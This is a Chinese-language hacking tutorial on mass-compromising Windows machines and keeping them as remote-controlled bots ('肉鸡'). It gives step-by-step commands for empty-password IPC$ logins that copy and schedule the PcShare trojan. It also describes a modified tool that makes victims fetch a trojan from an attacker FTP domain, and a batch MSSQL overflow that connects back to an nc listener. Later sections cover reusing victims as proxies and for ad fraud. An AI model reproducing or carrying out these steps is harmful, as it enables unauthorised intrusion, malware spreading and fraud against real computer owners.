一、 学入侵,抓肉机---环境搭建篇
内容:
【1】入侵! 我们究竟需要怎样的环境?(可选择的环境->最大程度上利于入侵的环境)
  <a>可选择的操作系统: Windows NT/2000(Pro&Server&Advanced Server)/XP(Pro&Home)/2003/vista
  <b>系统部署方法之推荐: 1)直接在真实机上安装双系统(WinXP PRO&Win2000 Server/Win2003 Server)
2)在真实机上安装单系统后,安装 虚拟机 程序,并虚拟出各种系统环境。
【2】使用虚拟机系统与真实机系统入侵的区别:
   
单从入侵的角度而言,本质区别不大,最终要实现的目的都是一致的。但如果从是否能够最大化的发挥计算机软硬件性能的角度分析,则使用真实机系统才是最佳的选择。(举例说明:直接在真实机的Win2000中执行扫描 VS 在虚拟机Win2000中执行扫描)
【3】入侵时的无奈:
   入侵工具对操作系统的挑剔,往往表现为对某操作平台的不支持,或是与操作系统中某组件、某个补丁的不兼容等。 所以,选择一个通用性较强的且系统状态持续保持在最原始的操作系统就显得尤为重要了(不打任何官方发布的补丁或是安装影响系统功能的程序)。
课程小结:入侵是目的,为了达到这个目的,事先一定要做好各项准备。搭建一个能够最大化发挥计算机软硬件性能的、通用性较强的、最大程度上利于入侵的环境,是入侵准备工作中的第一步,也是整个入侵过程中的重要环节之一。
【4】在虚拟机系统中完成针对入侵环境的部署
   <1>常用入侵工具的部署: 扫描类、溢出类、提权类、破解类、攻击类等
   <2>使用肉机或VPN代理来突破本地电信运营商作出的网络限制: 端口的封锁(135号端口)、IP访问限制等
   <3>将部署好的入侵环境做成虚拟机快照

二、学入侵,抓肉机---扫描
【1】常见端口扫描工具的使用
【2】扫描的优化处理: 有目的的扫描才算是有价值的扫描,扫描的过程也许是短暂的,也许会花费很长时间,而优化扫描的意义在于最大化的缩短扫描时间,最大化的发挥扫描结果的价值。
   <1>定位活跃IP段: 千万不要怕麻烦,这一步总体上决定了最终能够成功入侵的肉机的数量,也决定了你能在此刻就能得到这台肉机还是在1小时后。 (影响扫描效率的关键步骤)
   <2>反复扫描: 往往一些个人计算机所组成的网络最大程度上构成了活跃IP的范围,如果你扫描的服务所对应的端口(如135号)正是针对个人计算机的,那么在上网的高峰时间里进行反复扫描会让你收获颇丰。(反复扫描是充分利用活跃IP段资源的体现,但一定要把握好扫描时间和周期)
   <3>扫描结果的多向利用: 如果对5万台开着1433端口号的扫描结果仅使用sqlhello溢出的方法入侵过后就丢掉这些扫描结果的话,只能说太浪费了,你完全可以再去扫描一下它们中存在有SQL弱口令的机器。
   <4>端口组合筛选扫描: 如果你想快速得到一台3389肉机的话,你完全可以在已扫出开着1433端口计算机的结果中去筛选;当然,你也可以不去筛选,这样你将有机会自己动手开启一些服务器的终端服务。
【3】漏洞产生的原因、漏洞的分类、典型漏洞举例
   <1>哪儿来的漏洞: 1)操作系统自身存在的;2)应用软件中存在的
   <2>为什么会有漏洞: 1)人为因素;2)非人为因素
   <3>漏洞的分类: 1)口令薄弱类;2)程序设计缺陷类(0Day/缓冲区溢出)
   <4>典型(流行)的漏洞:
       1)(操作系统)口令类: 135(Wmi)、139(Ipc$)、3389(TS)
       2)(操作系统)溢出类: 42(Wins)、53(Dns)、135(Dcom)
       3)(应用软件)口令类: 4899(Radmin)、5900(Vnc)、8080(ApacheTomcat)
       4)(应用软件)溢出类: 21(Serv-U)、1433(MSSql)、2967(NortonAntiVirus)
【4】哪些端口扫描的价值较大,能够被入侵的成功率较高?
    <1>操作系统: 21(MSFtp)、135
    <2>第三方: 21(Serv-U)、1433、4899、5900、8080
【5】扫描方法分类:
    <1>全TCP连接: 这种扫描方法使用三次握手,与目标计算机建立标准的TCP连接,扫描的结果准确性较高,但扫描速度较慢。还需要强调的是,这种古老的扫描方法很容易被目标主机记录下来。
    <2>半开式扫描(SYN扫描): 在这种扫描技术中,扫描主机自动向目标计算机的指定端口发送SYN数据段,表示发送建立连接请求。由于扫描过程中,全连接尚未建立,所以大大降低了被目标计算机的记录的可能性,并且加快了扫描的速度。
小结:扫描看似简单,但实际上其中有很多学问。高效率的扫描要做到:知道扫描什么最有意义、掌握正确的扫描方法、最大化的发挥扫描结果的价值。

三、学入侵,抓肉机---入侵
 【1】入侵的原则:决不在一台主机上花费过多的时间,决不在入侵的主机上搞破坏
 【2】实例入侵演示-135端口空口令入侵
用到的工具: S扫描器、135抓鸡工具、C32Asm反汇编工具、NtScan扫描器、Recton.exe、Pcshare远控木马软件、FTPServer。3322.org免费动态域名。
  方法 1 Ntscan
   1、  S 扫描器,扫描开放135端口的IP地址,并且整理放在ip.txt文件中。
   2、  用ntscan从这些IP扫描出弱口令。
   3、  用管理员建立IPC连接
net use \\192.168.1.248\ipc$ "" /user:administrator
   4 、 查看远程服务器的时间
net time \\192.168.1.248
   5 、把配置好的pcshare木马拷贝到远程服务器上。
copy c:\server.exe \\192.168.1.248\c$
   6 、 用at命令计划运行木马文件。
at \\192.168.1.248 14:29 c:\server.exe
   7 、查看计划任务有没有运行
   8 、打开远程控制软件pcshare,看主机有没有上线。
或者:用Recton.exe工具强制开启对方的Telnet服务,开启了Telnet服务,后面什么事情都好做了。

方法2:   135自动抓鸡工具(只能自动抓空口令电脑)
   1、  用c32工具修改vip.exe文件,自动下载并且运行木马,
FTP服务器为:hyhu.3322.org,用户名:123,密码:123,木马名为:1.exe
如果运行vip.exe出错请安装,Microsoft.NET Framework 2.0
clip_image002
   2、  配置一个FTP服务器,并且新一个用户:123,密码:123。
   3、  配置一个木马名为:1.exe,并放在FTP用户123目录下。
   4、  申请一个免费的域名:hyhu.3322.org,并且设定解析为你的FTP服务器的IP地址。
   5、  修改ip.txt文件,把要扫描的网段输在里面格式
210.1.1.1 210.1.255.254
   6 、运行批处理文件 135 端口自动批量抓鸡 2003版.bat
   7 、通过FTP服务器查看有多少IP下载了木马,也可以打开木马远控软件看有多少肉鸡上线。
【3】实例入侵演示-1433(MSSQL)端口弱口令入侵
scan扫描器、sql查询分析器、SQLtools.exe、Pcshare远控木马软件。
   1、  在scan目录中的ip.txt输入要扫描的IP地址。
   2、  运行scan目录中的scan.bat批处理文件,开始扫描开放了1433端口服务器并且扫描sa为弱口令的服务器。默认用tcp扫描,可以修改批处理改为syn扫描。
   3、  运行SQLTools.exe工具软件,连接弱口令的服务器。
   4、  连接成功后可以点击“利用目录” &gt;“执行DOS命令”。
   5、  能够成功执行DOS命令后,后面什么事都可以做了,方法也很多。
【4】实例入侵演示-1433(MSSQL)端口缓冲区溢出入侵
   1、  运行overflow目录下的nc.bat,作用运行nc,并且开启1234端口监听。此端口可以改,不要冲就OK。
   2、  修改1433.bat文件,IP输入你的公网IP地址,端口和nc.bat定义的端口一样。
   3、  运行1433.bat,根据cleanupips.txt里面的IP地址自动SQL溢出。 cleanupips.txt 里面的 IP 地址是前面扫描到开放1433端口的服务器。

四、学入侵,抓肉机---肉鸡利用
   【1】利用肉机抓肉机(推荐进行时间:深夜)
   【2】利用肉机做代理:Socks/HTTP VPN
   【3】利用肉机做网赚:挂程序、刷广告

五、学入侵,抓肉机---学习方向指导
【1】入侵,没有具体的方法和思路!
【2】入侵的动机与意义:
   <1>纯属好奇,觉得好玩;
   <2>觉得这样很酷,别人知道了会对自己刮目相看;
   <3>锻炼技术,增长见识;
   <4>职业黑客,为了达到商业目的。
【3】入侵的底线:绝不搞破坏, 到即止。
【4】学习方向:操作系统、 编程 、脚本、破解、病毒……
【5】学习目标:熟悉各种操作系统、能够独立发现程序漏洞( 0Day )、能够按需编写程序。

备注:所用到的工具已经上传到附件,里面工具有可能被病毒查杀,但可以放心使用。